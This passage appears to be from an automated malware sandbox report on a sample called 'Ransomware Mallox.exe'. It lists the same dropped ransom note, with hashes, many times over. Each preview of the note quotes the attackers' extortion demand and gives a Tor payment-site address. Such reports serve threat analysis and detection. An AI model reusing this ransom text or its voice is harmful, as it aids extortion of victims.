                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
